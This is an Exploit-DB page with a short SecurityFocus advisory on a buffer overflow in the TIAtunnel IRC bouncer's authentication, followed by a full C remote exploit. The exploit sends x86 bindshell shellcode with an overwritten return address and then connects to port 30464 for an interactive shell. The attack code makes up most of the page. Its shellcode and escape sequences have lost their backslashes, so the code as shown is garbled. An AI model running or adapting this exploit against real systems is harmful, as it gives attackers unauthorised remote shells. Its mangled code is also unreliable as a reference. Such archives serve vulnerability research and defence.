https://www.exploit-db.com/exploits/20902

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/2831/info

TIAtunnel is a freely available IRC session bouncing software package. It is distributed by the pkcrew.

A problem in the software package makes it possible for a remote user to gain a local shell. Due to a buffer overflow in the authentication mechanism of TIAtunnel, it is possible for a remote user to overwrite variables on the stack, including the return address, and thus gaining a remote shell.

Therefore, it is possible for a remote user to gain a local interactive shell with the permissions of the TIAtunnel process. 

/*  
 *  TIAtunnel-0.9alpha2 Linux x86 remote exploit
 *  by qitest1 - 5/06/2001
 *
 *  Shellcode is executed with the privileges of the program. I 
 *  noticed that with a simple execve() a shell was executed but its 
 *  IO was linked with the term where TIAtunnel was launched. This 
 *  is not a problem for us if we use a bindshell code.  
 *
 *  Greets: recidjvo->Tnx for this bug. And now you can really smile. 
 *	    Nail    ->Dear friend ;)		 
 *  Hmm.. 0x69 seems to strike again..
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>

#define RETPOS 		516		

struct targ
{
   int                  def;
   char                 *descr;
   unsigned long int    retaddr;
};

struct targ target[]=
    {                   
      {0, "RedHat 6.2 with TIAtunnel-0.9alpha2 from tar.gz", 0xbffff67c},
      {69, NULL, 0}
    };

char shellcode[] =		/* bindshell at port 30464 */
  "x31xc0xb0x02xcdx80x85xc0x75x43xebx43x5ex31xc0"
  "x31xdbx89xf1xb0x02x89x06xb0x01x89x46x04xb0x06"
  "x89x46x08xb0x66xb3x01xcdx80x89x06xb0x02x66x89"
  "x46x0cxb0x77x66x89x46x0ex8dx46x0cx89x46x04x31"
  "xc0x89x46x10xb0x10x89x46x08xb0x66xb3x02xcdx80"
  "xebx04xebx55xebx5bxb0x01x89x46x04xb0x66xb3x04"
  "xcdx80x31xc0x89x46x04x89x46x08xb0x66xb3x05xcd"
  "x80x88xc3xb0x3fx31xc9xcdx80xb0x3fxb1x01xcdx80"
  "xb0x3fxb1x02xcdx80xb8x2fx62x69x6ex89x06xb8x2f"
  "x73x68x2fx89x46x04x31xc0x88x46x07x89x76x08x89"
  "x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31"
  "xc0xb0x01x31xdbxcdx80xe8x5bxffxffxff";

char		mybuf[RETPOS + 4 + 1 + 1];

int             sockami(char *host, int port);
void		do_mybuf(unsigned long retaddr);
void		shellami(int sock);
void            usage(char *progname);

main(int argc, char **argv)
{
int 	i,
	sel = 0,
	port = 0,
	offset = 0,
	sock,
        cnt;
char 	*host = NULL;

  printf("n  TIAtunnel-0.9alpha2 exploit by qitest1nn");
  
  if(argc == 1)
        usage(argv[0]);
  while((cnt = getopt(argc,argv,"h:p:t:o:")) != EOF)
    {
   switch(cnt)
        {
   case 'h':
     host = strdup(optarg);
     break;
   case 'p':
     port = atoi(optarg);
     break;
   case 't':
     sel = atoi(optarg);       
     break;
   case 'o':
     offset = atoi(optarg);
     break;
   default:
     usage(argv[0]);
     break;
        }
    }
  if(host == NULL)
        usage(argv[0]);
  if(port == 0)
	usage(argv[0]);

  printf("+Host: %sn  as: %sn", host, target[sel].descr);
  printf("+Connecting to %s...n", host);
  sock = sockami(host, port);
  printf("  connectedn");

  target[0].retaddr += atoi(argv[1]);
  printf("+Building buffer with retaddr: %p...n", target[0].retaddr);
  do_mybuf(target[0].retaddr);
  strcat(mybuf, "n");
  printf("  donen");
  send(sock, mybuf, strlen(mybuf), 0);
  printf("+Overflowing...n");

  printf("+Zzing...n");
  sleep(2);
  printf("+Getting shell...n");
  sock = sockami(host, 30464);  
  shellami(sock);
}

int
sockami(char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock == -1)
	{
          perror("socket()");
          exit(-1);
        }
 
  hp = gethostbyname(host);
  if(hp == NULL)
        {
          perror("gethostbyname()");
          exit(-1);
        }

  memset(&address, 0, sizeof(address));
  memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons(port);

  if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
        {
          perror("connect()");
          exit(-1);
        }

  return(sock);
}

void
do_mybuf(unsigned long int retaddr)
{
int		i,
		n = 0;
unsigned long 	*ret;

  memset(mybuf, 0x90, sizeof(mybuf));
  for(i = RETPOS - strlen(shellcode); i < RETPOS; i++)
	{
          mybuf[i] = shellcode[n++];
	}
  ret = (unsigned long *) (mybuf + RETPOS);
  *ret = retaddr;
  mybuf[RETPOS + 4] = 'x00';
}

void
shellami(int sock)
{
int             n;
char            recvbuf[1024];
char            *cmd = "id; uname -an";
fd_set          rset;

  send(sock, cmd, strlen(cmd), 0);

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(sock,&rset);
      FD_SET(STDIN_FILENO,&rset);
      select(sock+1,&rset,NULL,NULL,NULL);
      if (FD_ISSET(sock,&rset))
        {
          n=read(sock,recvbuf,1024);
          if (n <= 0)
            {
              printf("Connection closed by foreign host.n");
              exit(0);
            }
          recvbuf[n]=0;
          printf("%s",recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO,&rset))
        {
          n=read(STDIN_FILENO,recvbuf,1024);
          if (n>0)
            {
              recvbuf[n]=0;
              write(sock,recvbuf,n);
            }
        }
    }
  return;
}

void
usage(char *progname)
{
int             i = 0;
  
  printf("Usage: %s [options]n", progname);
  printf("Options:n"
         "  -h hostnamen"
	 "  -p portn"
         "  -t targetn"
         "  -o offsetn"
         "Available targets:n");
  while(target[i].def != 69)
        { 
          printf("  %d) %sn", target[i].def, target[i].descr);
          i++;
        } 

  exit(1);
}